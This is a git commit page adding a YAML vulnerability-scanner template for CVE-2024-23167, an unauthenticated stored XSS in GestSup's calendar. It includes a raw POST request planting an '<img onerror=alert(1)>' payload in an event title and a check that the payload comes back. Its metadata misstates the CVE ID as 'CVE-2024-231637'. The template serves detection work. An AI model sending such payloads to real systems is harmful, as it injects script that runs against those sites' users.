Added/Fixed/Updated CVE-2024-23167 Template

2024-08-07 22:06:40 +09:00 · 2024-08-07 22:06:40 +09:00 · b88a78cfef
parent 7f2067e2bd
commit b88a78cfef
1 changed files with 47 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-23167.yaml
+++ b/http/cves/2024/CVE-2024-23167.yaml
@ -0,0 +1,47 @@
+id: CVE-2024-23167
+
+info:
+  name: Unauthenticated stored XSS on calendar events (CVE-2024-23167)
+  author: eeche,chae1xx1os,persona-twotwo,soonghee2,gy741
+  severity: high
+  description: GestSup allows its users to add events to the calendar of all users. This is the HTTP request sent when a user adds an event to their calendar.
+  impact: |
+   This vulnerability could allow unauthenticated attackers to compromise users accessing the Calendar feature of the application.
+  remediation:
+   Apply security patches, validate and sanitize inputs to prevent XSS, and ensure proper authentication. Prevent JavaScript execution in the calendar.php file.
+  reference:
+   https://www.synacktiv.com/advisories/multiple-vulnerabilities-on-gestsup-3244
+   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23167
+   https://doc.gestsup.fr/install/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
+    cvss-score: 8.6
+    cve-id: CVE-2024-231637
+  metadata:
+    max-request: 2
+    vendor: gestsup
+    product: 
+     gestsup ver 3.2.15
+     Mariadb ver 10.7
+  tags: cve2024, cve, xss, web
+  
+
+requests:
+  - raw:
+      - |
+        POST /ajax/calendar.php HTTP/1.1
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+
+        action=add_event&title=<img/src/onerror=alert(1)>&start=2024/7/30 07:30:00&end=2024/7/30 08:00:00&allday=false&technician=1
+
+      - |
+        GET /index.php?page=calendar HTTP/1.1
+        Cookie: PHPSESSID=9930071b83c5d8aad093aebf8e60a719
+
+    matchers:
+      - type: word
+        words:
+          - '<img'
+          - 'alert(1)'
+        part: body